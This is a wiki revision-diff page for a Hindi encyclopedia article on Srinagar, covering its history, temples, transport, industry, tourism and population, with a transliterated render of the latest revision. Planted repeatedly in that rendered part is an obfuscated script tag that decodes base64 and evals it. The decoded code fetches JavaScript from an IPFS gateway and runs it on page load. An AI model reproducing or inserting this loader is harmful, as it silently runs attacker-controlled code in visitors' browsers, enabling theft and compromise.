Difference between revisions of "श्रीनगर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "मुगल" to "मुग़ल")
 
(21 intermediate revisions by 10 users not shown)
Line 1: Line 1:
 +
{{लेख सूची
 +
|लेख का नाम=श्रीनगर
 +
|पर्यटन=श्रीनगर पर्यटन
 +
|ज़िला=श्रीनगर ज़िला
 +
}}
 +
{{बहुविकल्प|बहुविकल्पी शब्द=श्रीनगर|लेख का नाम=श्रीनगर (बहुविकल्पी)}}
 
{{सूचना बक्सा पर्यटन
 
{{सूचना बक्सा पर्यटन
 
|चित्र=Dal-Lake-Srinagar.jpg
 
|चित्र=Dal-Lake-Srinagar.jpg
|विवरण=कश्मीर घाटी के मध्य में बसा श्रीनगर [[भारत]] के प्रमुख पर्यटन स्थलों में से हैं।  
+
|विवरण=[[कश्मीर की घाटी|कश्मीर घाटी]] के मध्य में बसा श्रीनगर [[भारत]] के प्रमुख पर्यटन स्थलों में से हैं।  
 
|राज्य=[[जम्मू और कश्मीर]]
 
|राज्य=[[जम्मू और कश्मीर]]
|ज़िला=[[श्रीनगर ज़िला]]
+
|ज़िला=[[श्रीनगर ज़िला|श्रीनगर]]
|निर्माता=सम्राट [[अशोक]]   
+
|निर्माता=[[अशोक|सम्राट अशोक]]   
 
|स्वामित्व=
 
|स्वामित्व=
 
|प्रबंधक=
 
|प्रबंधक=
|निर्माण काल=तीसरी सदी ईसा पूर्व
+
|निर्माण काल=तीसरी [[सदी]] ईसा पूर्व
 
|स्थापना=
 
|स्थापना=
|भौगोलिक स्थिति=
+
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=34.09,74.79&ll=34.095316,74.790115&spn=0.132771,0.220757&t=m&z=12&vpsrc=0 उत्तर- 34°5′24″; पूर्व- 74°47′24″]
|मार्ग स्थिति=यह शहर सड़क द्वारा [[जम्मू]] से 293 किमी, [[गुलमर्ग]] से 52 किमी, [[कारगिल]] से 204 किमी, [[लेह]] से 434 किमी, [[चंडीगढ़]] से 630 किमी और [[दिल्ली]] से 876 किमी. दूरी पर स्थित है।  
+
|मार्ग स्थिति=श्रीनगर शहर सड़क द्वारा [[जम्मू]] से 293 किमी, [[गुलमर्ग]] से 52 किमी, [[कारगिल]] से 204 किमी, [[लेह]] से 434 किमी, [[चंडीगढ़]] से 630 किमी और [[दिल्ली]] से 876 किलोमीटर दूरी पर स्थित है।  
|प्रसिद्धि=श्रीनगर विशेष रूप से झीलों और हाऊसबोट के लिए जाना जाता है और डल झील के लिए भी प्रसिद्ध है।
+
|प्रसिद्धि=श्रीनगर विशेष रूप से [[झील|झीलों]] और हाऊसबोट के लिए जाना जाता है।
|कब जाएँ=साल में कभी भी
+
|कब जाएँ=कभी भी जा सकते हैं
|यातायात=
+
|यातायात=रिक्शा, ऑटो-रिक्शा और  टैक्सी
|हवाई अड्डा=श्रीनगर हवाई-अड्डा
+
|हवाई अड्डा=शेख़ उल आलम हवाई अड्डा
 
|रेलवे स्टेशन=निकटतम रेलवे स्टेशन जम्मू तवी
 
|रेलवे स्टेशन=निकटतम रेलवे स्टेशन जम्मू तवी
 
|बस अड्डा=
 
|बस अड्डा=
 
|कैसे पहुँचें=हवाई जहाज़, रेल, बस  
 
|कैसे पहुँचें=हवाई जहाज़, रेल, बस  
 
|क्या देखें=[[श्रीनगर पर्यटन]]
 
|क्या देखें=[[श्रीनगर पर्यटन]]
|कहाँ ठहरें=[[श्रीनगर प्रवास]]
+
|कहाँ ठहरें=होटल, गेस्ट हाउस
 
|क्या खायें=
 
|क्या खायें=
 
|क्या ख़रीदें=
 
|क्या ख़रीदें=
 
|एस.टी.डी. कोड=0194
 
|एस.टी.डी. कोड=0194
|ए.टी.एम=
+
|ए.टी.एम=लगभग सभी
 
|सावधानी=
 
|सावधानी=
|मानचित्र लिंक=[http://maps.google.co.in/maps?f=q&source=s_q&hl=en&geocode=&q=Srinagar,+Jammu+and+Kashmir&sll=21.125498,81.914063&sspn=34.855829,56.513672&ie=UTF8&hq=&hnear=Srinagar,+Jammu+and+Kashmir&z=11 गूगल का मानचित्र]
+
|मानचित्र लिंक=[http://maps.google.com/maps?saddr=Aerodrome+Rd,+Jammu+%26+Kashmir,+India+(Sheikh+ul+Alam+Airport)&daddr=Srinagar&hl=en&sll=34.083658,74.797368&sspn=0.328136,0.676346&geocode=FYCbBgIduvR0BCEXBNHmsL6-3w%3BFUoTCAIdOFF1BCnvxeOGVoXhODHGBePBfEskZg&vpsrc=0&mra=pd&t=m&z=12&iwloc=ddw0 गूगल का मानचित्र]
 
|संबंधित लेख=
 
|संबंधित लेख=
|शीर्षक 1=भाषा
+
|शीर्षक 1=[[भाषा]]
 
|पाठ 1=[[कश्मीरी भाषा|कश्मीरी]], [[उर्दू भाषा|उर्दू]], [[हिन्दी]] और [[अंग्रेज़ी]]
 
|पाठ 1=[[कश्मीरी भाषा|कश्मीरी]], [[उर्दू भाषा|उर्दू]], [[हिन्दी]] और [[अंग्रेज़ी]]
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=
+
|अन्य जानकारी=महाराज ललितादित्य यहाँ का प्रख्यात [[हिन्दू]] राजा था। इसका शासनकाल 700 ई. के लगभग था। इसने श्रीनगर की वृद्धि की तथा [[कश्मीर]] के राज्य का दूर-दूर तक विस्तार भी किया। 
|बाहरी कड़ियाँ=
+
|बाहरी कड़ियाँ=[http://srinagar.nic.in/ आधिकारिक वेबसाइट]
|अद्यतन=
+
|अद्यतन={{अद्यतन|11:24, 22 दिसम्बर 2011 (IST)}}
}}
 
{{लेख सूची
 
|लेख का नाम=श्रीनगर
 
|पर्यटन=श्रीनगर पर्यटन
 
|ज़िला=श्रीनगर ज़िला
 
|प्रवास=श्रीनगर प्रवास
 
 
}}
 
}}
श्रीनगर शहर, [[जम्मू और कश्मीर|जम्मू–कश्मीर]] राज्य की ग्रीष्मकालीन राजधानी, उत्तरी [[भारत]], [[झेलम नदी]] के तट पर बसा यह शहर कश्मीर घाटी में 1,600 मीटर की ऊँचाई पर स्थित है। श्रीगर चीड़, फ़र और देवदार के वृक्षों से ढके पर्वतों के बीच स्थित है। श्रीनगर की नींव, कल्हणरचित राजतरंगिणी<ref>राजतरंगिणी, 1, 5,104</ref>, (स्टाइन का अनुवाद) के अनुसार मौर्य सम्राट [[अशोक]] ने डाली थी। उसने कश्मीर की यात्रा 245 ई. पू. में की थी। इस तथ्य को देखते हुए श्रीनगर लगभग 2200 वर्ष प्राचीन नगर ठहरता है। अशोक का बसाया हुआ नगर वर्तमान श्रीनगर से प्रायः 3 मील उत्तर में बसा हुआ था। प्राचीन नगर की स्थिति को आजकल पांडरेथान अथवा प्राचीन स्थान कहा जाता है।
+
'''श्रीनगर''' शहर, [[जम्मू और कश्मीर|जम्मू–कश्मीर]] राज्य की ग्रीष्मकालीन राजधानी, उत्तरी [[भारत]], [[झेलम नदी]] के तट पर बसा यह शहर [[कश्मीर की घाटी|कश्मीर घाटी]] में 1,600 मीटर की ऊँचाई पर स्थित है। श्रीनगर को '''झीलों का नगर''' भी कहा जाता है। श्रीनगर [[चीड़]], फ़र और [[देवदार]] के वृक्षों से ढके [[पर्वत|पर्वतों]] के बीच स्थित है। श्रीनगर की नींव, कल्हणरचित राजतरंगिणी<ref>राजतरंगिणी, 1, 5,104</ref>, (स्टाइन का अनुवाद) के अनुसार मौर्य सम्राट [[अशोक]] ने डाली थी। उसने कश्मीर की यात्रा 245 ई. पू. में की थी। इस तथ्य को देखते हुए श्रीनगर लगभग 2200 वर्ष प्राचीन नगर ठहरता है। अशोक का बसाया हुआ नगर वर्तमान श्रीनगर से प्रायः 3 मील उत्तर में बसा हुआ था। प्राचीन नगर की स्थिति को आजकल पांडरेथान अथवा प्राचीन स्थान कहा जाता है।
 
==इतिहास==
 
==इतिहास==
महाराज ललितादित्य यहाँ का प्रख्यात हिन्दू राजा था। इसका शासनकाल 700 ई. के लगभग था। इसने श्रीनगर की श्रीवृद्धि की तथा कश्मीर के राज्य का दूर-दूर तक विस्तार भी किया। इसने झेलम पर कई पुल बंधवाए तथा नहरें बनवाईं। श्रीनगर में हिन्दू नरेशों के समय के अनेक प्राचीन मन्दिर थे, जिन्हें मुसलमानों के शासनकाल में नष्ट–भ्रष्ट करके उनके स्थान पर दरगाहें व मस्जिद बना ली गई थीं। झेलम के तीसरे पुल पर महाराज नरेन्द्र द्वितीय का 180 ई. के लगभग बनवाया हुआ नरेन्द्र स्वामी का मन्दिर था। यह नरपीर की ज़ियारतगाह के रूप में परिणत कर दिया गया था। [[चित्र:Srinagar-Kashmir.jpg|thumb|250px|left|हाउसबोट, श्रीनगर<br />Houseboat, Srinagar]] चौथे पुल के निकट नदी के दक्षिणी तट पर पाँच शिखरों वाला मन्दिर महाश्रीमन्दिर नाम से विख्यात था; इसे महाराज प्रवरसेन द्वितीय ने अपार धन–राशि व्यय कर निर्मित करवाया था। 1404 ई. में कश्मीर के शासक शाह सिकन्दर की बेगम की मृत्यु होने पर उसे इस मन्दिर के आँगन में दफ़ना दिया गया और उसी समय से यह विशाल मन्दिर मक़बरा बन गया। कश्मीर का प्रसिद्ध सुल्तान जैनुलआबदीन, जिसे कश्मीर का अकबर कहा जाता है, इसी मन्दिर के प्रांगण में दफ़नाया गया था। यह स्थान मक़बरा शाही के नाम से प्रसिद्ध हुआ। कहा जाता है कि नदी के छठे पुल के समीप, दक्षिणी तट पर महाराज युधिष्ठर के मंत्री स्कंदगुप्त द्वारा बनवाया एक अन्य मन्दिर भी था। इसे पीर बाशु की ज़ियारतगाह के रूप में परिणत कर दिया गया।  
+
महाराज ललितादित्य यहाँ का प्रख्यात हिन्दू राजा था। इसका शासनकाल 700 ई. के लगभग था। इसने श्रीनगर की श्रीवृद्धि की तथा कश्मीर के राज्य का दूर-दूर तक विस्तार भी किया। इसने [[झेलम नदी|झेलम]] पर कई पुल बंधवाए तथा नहरें बनवाईं। श्रीनगर में [[हिन्दू]] नरेशों के समय के अनेक प्राचीन मन्दिर थे, जिन्हें [[मुसलमान|मुसलमानों]] के शासनकाल में नष्ट–भ्रष्ट करके उनके स्थान पर दरगाहें व मस्जिद बना ली गई थीं। झेलम के तीसरे पुल पर महाराज नरेन्द्र द्वितीय का 180 ई. के लगभग बनवाया हुआ नरेन्द्र स्वामी का मन्दिर था। यह नरपीर की ज़ियारतगाह के रूप में परिणत कर दिया गया था। [[चित्र:Srinagar-Kashmir.jpg|thumb|250px|left|हाउसबोट, श्रीनगर]] चौथे पुल के निकट नदी के दक्षिणी तट पर पाँच शिखरों वाला मन्दिर महाश्रीमन्दिर नाम से विख्यात था; इसे महाराज प्रवरसेन द्वितीय ने अपार धन–राशि व्यय कर निर्मित करवाया था। 1404 ई. में कश्मीर के शासक शाह सिकन्दर की बेगम की मृत्यु होने पर उसे इस मन्दिर के आँगन में दफ़ना दिया गया और उसी समय से यह विशाल मन्दिर मक़बरा बन गया। कश्मीर का प्रसिद्ध सुल्तान जैनुलआबदीन, जिसे कश्मीर का अकबर कहा जाता है, इसी मन्दिर के प्रांगण में दफ़नाया गया था। यह स्थान मक़बरा शाही के नाम से प्रसिद्ध हुआ। कहा जाता है कि नदी के छठे पुल के समीप, दक्षिणी तट पर महाराज युधिष्ठर के मंत्री स्कंदगुप्त द्वारा बनवाया एक अन्य मन्दिर भी था। इसे पीर बाशु की ज़ियारतगाह के रूप में परिणत कर दिया गया।  
  
684-693 ई. में महाराज चंद्रापदी द्वारा बनवाया हुआ त्रिभुवन स्वामी का मन्दिर भी समीप ही स्थित था। इस पर टांगा बाबा नामक एक पीर ने अधिकार करके इसे दरगाह का रूप दे दिया। सुल्तान सिकन्दर ने 1404 ई. में जामा मस्जिद बनाने के लिए महाराज तारापदी द्वारा 693-697 में निर्मित एक प्रसिद्ध मन्दिर को तोड़ डाला और उसकी सारी सामग्री मस्जिद बनाने में लगा दी। 1623 ई. के लगभग बेगम [[नूरजहाँ]] ने, जब वह [[जहाँगीर]] के साथ कश्मीर आईं, [[सुलेमान पर्वत]] के ऊपर बना हुआ शंकराचार्य का मन्दिर देखा और इसकी पैड़ियों में लगे हुए बहुमूल्य पत्थर के टुकड़ों को उखड़वाकर उन्हें अपनी बनवाई हुई मस्जिद में लगवा दिया। केवल शंकराचार्य का मन्दिर ही अब श्रीनगर का प्राचीन हिन्दू स्मारक कहा जा सकता है। किंवदन्ती के अनुसार इस मन्दिर की स्थापना दक्षिण के प्रसिद्ध दार्शनिक [[शंकराचार्य]] ने 8वीं शती ई. में की थी। जहाँगीर तथा [[शाहजहाँ]] के समय के शालीमार तथा निशान्त नामक सुन्दर उद्यान, तथा इसी काल की कई मस्जिदें श्रीनगर के प्रमुख ऐतिहासिक स्मारक हैं। कहा जाता है कि निशान्तबाग़ नूरजहाँ के भाई [[आसफ़ ख़ाँ]] का बनवाया हुआ था। शालीमार का निर्माण जहाँगीर और उसकी प्रिय बेग़म नूरजहाँ ने किया था। मुग़लों ने कश्मीर में 700 बाग़ लगवाए थे।  
+
684-693 ई. में महाराज चंद्रापदी द्वारा बनवाया हुआ त्रिभुवन स्वामी का मन्दिर भी समीप ही स्थित था। इस पर टांगा बाबा नामक एक पीर ने अधिकार करके इसे दरगाह का रूप दे दिया। सुल्तान सिकन्दर ने 1404 ई. में जामा मस्जिद बनाने के लिए महाराज तारापदी द्वारा 693-697 में निर्मित एक प्रसिद्ध मन्दिर को तोड़ डाला और उसकी सारी सामग्री मस्जिद बनाने में लगा दी। 1623 ई. के लगभग बेगम [[नूरजहाँ]] ने, जब वह [[जहाँगीर]] के साथ कश्मीर आईं, [[सुलेमान पर्वत]] के ऊपर बना हुआ [[शंकराचार्य]] का मन्दिर देखा और इसकी पैड़ियों में लगे हुए बहुमूल्य पत्थर के टुकड़ों को उखड़वाकर उन्हें अपनी बनवाई हुई मस्जिद में लगवा दिया। केवल शंकराचार्य का मन्दिर ही अब श्रीनगर का प्राचीन हिन्दू स्मारक कहा जा सकता है। किंवदन्ती के अनुसार इस मन्दिर की स्थापना दक्षिण के प्रसिद्ध दार्शनिक [[शंकराचार्य]] ने 8वीं शती ई. में की थी। जहाँगीर तथा [[शाहजहाँ]] के समय के [[शालीमार बाग़ श्रीनगर|शालीमार]] तथा [[निशात बाग़ श्रीनगर|निशात]] नामक सुन्दर उद्यान, तथा इसी काल की कई मस्जिदें श्रीनगर के प्रमुख ऐतिहासिक स्मारक हैं। कहा जाता है कि निशातबाग़ नूरजहाँ के भाई [[आसफ़ ख़ाँ]] का बनवाया हुआ था। शालीमार का निर्माण जहाँगीर और उसकी प्रिय बेगम नूरजहाँ ने किया था। [[मुग़ल|मुग़लों]] ने कश्मीर में 700 बाग़ लगवाए थे।  
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
====<u>वायु मार्ग</u>====
+
====वायु मार्ग====
 
श्रीनगर में श्रीनगर हवाई-अड्डा स्थित है। इंडियन एयरलाइन्स [[दिल्ली]], [[अमृतसर]], [[जम्मू]], [[लेह]], [[चंडीगढ़]], [[अहमदाबाद]] और [[मुम्बई]] से श्रीनगर के लिए उड़ान भरती है।
 
श्रीनगर में श्रीनगर हवाई-अड्डा स्थित है। इंडियन एयरलाइन्स [[दिल्ली]], [[अमृतसर]], [[जम्मू]], [[लेह]], [[चंडीगढ़]], [[अहमदाबाद]] और [[मुम्बई]] से श्रीनगर के लिए उड़ान भरती है।
[[चित्र:Nishat-Bagh-Srinagar.jpg|thumb|250px|left|[[निशात बाग़ श्रीनगर|निशात बाग़]], श्रीनगर<br />Nishat Bagh, Srinagar]]
+
[[चित्र:Nishat-Bagh-Srinagar.jpg|thumb|250px|left|[[निशात बाग़ श्रीनगर|निशात बाग़]], श्रीनगर]]
====<u>रेल मार्ग</u>====
+
====रेल मार्ग====
 
श्रीनगर से निकटतम रेलवे स्टेशन जम्मू तवी है। रेलवे स्टेशन से जम्मू तवी 293 किमी की दूरी पर स्थित है। जम्मू तवी रेलवे स्टेशन से दिल्ली, [[कोलकाता]], [[पूना]], मुंबई, [[कन्याकुमारी]], अहमदाबाद आदि प्रमुख नगरों से नियमित रेल सेवा उपलब्ध है।
 
श्रीनगर से निकटतम रेलवे स्टेशन जम्मू तवी है। रेलवे स्टेशन से जम्मू तवी 293 किमी की दूरी पर स्थित है। जम्मू तवी रेलवे स्टेशन से दिल्ली, [[कोलकाता]], [[पूना]], मुंबई, [[कन्याकुमारी]], अहमदाबाद आदि प्रमुख नगरों से नियमित रेल सेवा उपलब्ध है।
====<u>सड़क मार्ग</u>====
+
====सड़क मार्ग====
 
श्रीनगर राष्ट्रीय राजमार्ग द्वारा कई प्रमुख शहरों से सड़क मार्ग द्वारा जुड़ा हुआ है।
 
श्रीनगर राष्ट्रीय राजमार्ग द्वारा कई प्रमुख शहरों से सड़क मार्ग द्वारा जुड़ा हुआ है।
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
श्रीनगर में विशिष्ट बाज़ार और खुदरा दुकानें भी हैं। शहर के उद्योगों में क़ालीन व रेशम की मिलें, चाँदी और ताँबे की वस्तुओं का निर्माण, चमड़े का काम और लकड़ी पर नक़्क़ाशी शामिल हैं।  
+
श्रीनगर में विशिष्ट बाज़ार और खुदरा दुकानें भी हैं। शहर के उद्योगों में क़ालीन व रेशम की मिलें, [[चाँदी]] और [[ताँबा|ताँबे]] की वस्तुओं का निर्माण, चमड़े का काम और लकड़ी पर नक़्क़ाशी शामिल हैं।  
[[चित्र:Shah-Hamdan-Mosque-Srinagar.jpg|thumb|250px|[[शाह हमदान मस्जिद श्रीनगर|शाह हमदान मस्जिद]], श्रीनगर<br />Shah Hamdan Mosque, Srinagar]]  
+
[[चित्र:Shah-Hamdan-Mosque-Srinagar.jpg|thumb|250px|शाह हमदान मस्जिद, श्रीनगर]]  
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
श्रीनगर शहर में कश्मीर विश्वविद्यालय ([[1969]]) है।
 
श्रीनगर शहर में कश्मीर विश्वविद्यालय ([[1969]]) है।
 
 
==पर्यटन==
 
==पर्यटन==
 
{{main|श्रीनगर पर्यटन}}
 
{{main|श्रीनगर पर्यटन}}
श्रीनगर का जम्मू और कश्मीर के पर्यटन स्थलों में बहुत महत्त्वपूर्ण स्थान है। [[कश्मीर की घाटी|कश्मीर घाटी]] के मध्य में बसा श्रीनगर [[भारत]] के प्रमुख पर्यटन स्थलों में से हैं। श्रीनगर एक ओर जहाँ डल झील के लिए प्रसिद्ध है वहीं दूसरी ओर विभिन्न मंदिरों के लिए विशेष रूप से प्रसिद्ध है। स्वच्छ [[झील]] और ऊँचे पर्वतों के बीच बसे श्रीनगर की अर्थव्यवस्था का आधार लम्बे समय से मुख्यतः पर्यटन है। शहर से होकर नदी के प्रवाह पर सात पुल बने हुए हैं। इससे लगे विभिन्न नहरों एवं जलमार्गों में शिकारे भरे पड़े हैं। श्रीनगर अपने मन्दिरों और मस्जिदों के लिए प्रसिद्ध है।  
+
श्रीनगर का जम्मू और कश्मीर के पर्यटन स्थलों में बहुत महत्त्वपूर्ण स्थान है। [[कश्मीर की घाटी|कश्मीर घाटी]] के मध्य में बसा श्रीनगर [[भारत]] के प्रमुख पर्यटन स्थलों में से हैं। श्रीनगर एक ओर जहाँ [[डल झील]] के लिए प्रसिद्ध है वहीं दूसरी ओर विभिन्न मंदिरों के लिए विशेष रूप से प्रसिद्ध है। स्वच्छ [[झील]] और ऊँचे [[पर्वत|पर्वतों]] के बीच बसे श्रीनगर की अर्थव्यवस्था का आधार लम्बे समय से मुख्यतः पर्यटन है। शहर से होकर नदी के प्रवाह पर सात पुल बने हुए हैं। इससे लगे विभिन्न नहरों एवं जलमार्गों में शिकारे भरे पड़े हैं। श्रीनगर अपने मन्दिरों और मस्जिदों के लिए प्रसिद्ध है।
 +
===दर्शनीय स्थल===
 +
#श्रीनगर से लगी एक पहाड़ी जिसको शंकराचार्य पहाड़ी कहते हैं, ऊपर [[आदि शंकराचार्य]] द्वारा स्थापित शिवलिंग है। पहाड़ी की 2 मील कठिन चढ़ाई है। पर्वत के नीचे शंकरमठ है, इसे दुर्गानाग मंदिर कहते हैं।
 +
#श्रीनगर में महाश्री का मंदिर चौथे पुल के पास तथा हरिपर्वत पर एक मंदिर है। संपूर्ण कश्मीर दर्शनीय है। नगर में पत्थर मस्जिद, नेहरू उद्यान दर्शनीय हैं और मुग़ल उद्यान तो अपने सौंदर्य के लिए ही प्रसिद्ध है।
 +
#[[कश्मीर]] में क्षीर-भवानी, अनन्तनाग और मार्तण्ड मंदिर दर्शनीय हैं। इन सब स्थानों पर मोटर बसें जाती हैं। श्रीनगर से मोटर बस से पहलगाँव जाते समय मध्य में अनन्तनाग है। मार्तण्ड मंदिर [[पर्वत]] पर है। नीचे पाण्डों का गाँव मटन है, वहाँ मार्तण्ड सरोवर तीर्थ है<ref>{{पुस्तक संदर्भ |पुस्तक का नाम= हिन्दूओं के तीर्थ स्थान|लेखक= सुदर्शन सिंह 'चक्र'|अनुवादक= |आलोचक= |प्रकाशक=|संकलन=|संपादन=|पृष्ठ संख्या=17|url=}}</ref>।
 
==जनसंख्या==
 
==जनसंख्या==
 
[[2001]] की गणना के अनुसार श्री नगर की कुल जनसंख्या 8,94,940 है। और श्रीनगर ज़िले की कुल जनसंख्या 12,38,530 है।
 
[[2001]] की गणना के अनुसार श्री नगर की कुल जनसंख्या 8,94,940 है। और श्रीनगर ज़िले की कुल जनसंख्या 12,38,530 है।
{{प्रचार}}
+
 
 +
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 73: Line 77:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Jami-Masjid-Srinagar.jpg|[[जामा मस्जिद श्रीनगर|जामा मस्जिद]], श्रीनगर
 +
चित्र:Chashme-Shahi.jpg|[[चश्मा ए शाही]], श्रीनगर
 +
चित्र:Thajiwas-Glacier-Sonamarg.jpg|थजिवास ग्लेशियर, [[सोनमर्ग श्रीनगर]]
 +
चित्र:Srinagar.jpg|श्रीनगर का एक दृश्य (1860)
 +
चित्र:Akbar-Bridge-Srinagar.jpg|अकबर पुल, श्रीनगर (1860)
 +
चित्र:View-Of-Houses-Srinagar.jpg|श्रीनगर में नहर से घरों का दृश्य (1870)
 +
चित्र:Boats-In-The-Jhelum-Srinagar.jpg|[[झेलम नदी]] में नौकाएं, श्रीनगर (1928)
 +
चित्र:Shalimar-Bagh-Srinagar.jpg|[[शालीमार बाग़ श्रीनगर|शालीमार बाग़]], श्रीनगर (1928)
 +
चित्र:Houseboat-On-The-Jhelum-River.jpg|[[झेलम नदी]] पर हाउसबोट, श्रीनगर (1930)
 +
चित्र:Lal-Chowk-Srinagar.jpg|लाल चौक, श्रीनगर
 +
चित्र:Train-Journey-From-Srinagar-To-Anantnag.jpg|श्रीनगर से [[अनंतनाग]] के लिए ट्रेन यात्रा
 +
</gallery>
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
 
==संबंधित लेख==
 
==संबंधित लेख==
{{प्रदेशों की राजधानी}}
+
{{पहाड़ी पर्यटन स्थल}}{{प्रदेशों की राजधानी}}{{जम्मू और कश्मीर के पर्यटन स्थल}}{{जम्मू और कश्मीर के नगर}}{{भारत गणराज्य}}
{{जम्मू और कश्मीर के पर्यटन स्थल}}{{जम्मू और कश्मीर के नगर}}
 
{{भारत गणराज्य}}
 
 
[[Category:जम्मू_और_कश्मीर]]
 
[[Category:जम्मू_और_कश्मीर]]
 
[[Category:जम्मू और कश्मीर के ऐतिहासिक नगर]]
 
[[Category:जम्मू और कश्मीर के ऐतिहासिक नगर]]
Line 87: Line 106:
 
[[Category:श्रीनगर]]
 
[[Category:श्रीनगर]]
 
[[Category:भारत के नगर]]
 
[[Category:भारत के नगर]]
 +
[[Category:पहाड़ी पर्यटन स्थल]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 11:34, 5 July 2017

shrinagar shrinagar paryatan shrinagar zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chitr:Disamb2.jpg shrinagar ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- shrinagar (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shrinagar
vivaran kashmir ghati ke madhy mean basa shrinagar bharat ke pramukh paryatan sthaloan mean se haian.
rajy jammoo aur kashmir
zila shrinagar
nirmata samrat ashok
nirman kal tisari sadi eesa poorv
bhaugolik sthiti uttar- 34°5′24″; poorv- 74°47′24″
marg sthiti shrinagar shahar s dak dvara jammoo se 293 kimi, gulamarg se 52 kimi, karagil se 204 kimi, leh se 434 kimi, chandigadh se 630 kimi aur dilli se 876 kilomitar doori par sthit hai.
prasiddhi shrinagar vishesh roop se jhiloan aur haoosabot ke lie jana jata hai.
kab jaean kabhi bhi ja sakate haian
kaise pahuanchean havaee jahaz, rel, bas
havaee adda shekh ul alam havaee adda
relave steshan nikatatam relave steshan jammoo tavi
yatayat riksha, aauto-riksha aur taiksi
kya dekhean shrinagar paryatan
kahaan thaharean hotal, gest haus
es.ti.di. kod 0194
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal ka manachitr
bhasha kashmiri, urdoo, hindi aur aangrezi
any janakari maharaj lalitadity yahaan ka prakhyat hindoo raja tha. isaka shasanakal 700 ee. ke lagabhag tha. isane shrinagar ki vriddhi ki tatha kashmir ke rajy ka door-door tak vistar bhi kiya.
bahari k diyaan adhikarik vebasait
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shrinagar shahar, jammoo–kashmir rajy ki grishmakalin rajadhani, uttari bharat, jhelam nadi ke tat par basa yah shahar kashmir ghati mean 1,600 mitar ki ooanchaee par sthit hai. shrinagar ko jhiloan ka nagar bhi kaha jata hai. shrinagar chi d, far aur devadar ke vrikshoan se dhake parvatoan ke bich sthit hai. shrinagar ki nianv, kalhanarachit rajatarangini[1], (stain ka anuvad) ke anusar maury samrat ashok ne dali thi. usane kashmir ki yatra 245 ee. poo. mean ki thi. is tathy ko dekhate hue shrinagar lagabhag 2200 varsh prachin nagar thaharata hai. ashok ka basaya hua nagar vartaman shrinagar se prayah 3 mil uttar mean basa hua tha. prachin nagar ki sthiti ko ajakal paandarethan athava prachin sthan kaha jata hai.

itihas

maharaj lalitadity yahaan ka prakhyat hindoo raja tha. isaka shasanakal 700 ee. ke lagabhag tha. isane shrinagar ki shrivriddhi ki tatha kashmir ke rajy ka door-door tak vistar bhi kiya. isane jhelam par kee pul bandhavae tatha naharean banavaeean. shrinagar mean hindoo nareshoan ke samay ke anek prachin mandir the, jinhean musalamanoan ke shasanakal mean nasht–bhrasht karake unake sthan par daragahean v masjid bana li gee thian. jhelam ke tisare pul par maharaj narendr dvitiy ka 180 ee. ke lagabhag banavaya hua narendr svami ka mandir tha. yah narapir ki ziyaratagah ke roop mean parinat kar diya gaya tha. thumb|250px|left|hausabot, shrinagar chauthe pul ke nikat nadi ke dakshini tat par paanch shikharoan vala mandir mahashrimandir nam se vikhyat tha; ise maharaj pravarasen dvitiy ne apar dhan–rashi vyay kar nirmit karavaya tha. 1404 ee. mean kashmir ke shasak shah sikandar ki begam ki mrityu hone par use is mandir ke aangan mean dafana diya gaya aur usi samay se yah vishal mandir maqabara ban gaya. kashmir ka prasiddh sultan jainulabadin, jise kashmir ka akabar kaha jata hai, isi mandir ke praangan mean dafanaya gaya tha. yah sthan maqabara shahi ke nam se prasiddh hua. kaha jata hai ki nadi ke chhathe pul ke samip, dakshini tat par maharaj yudhishthar ke mantri skandagupt dvara banavaya ek any mandir bhi tha. ise pir bashu ki ziyaratagah ke roop mean parinat kar diya gaya.

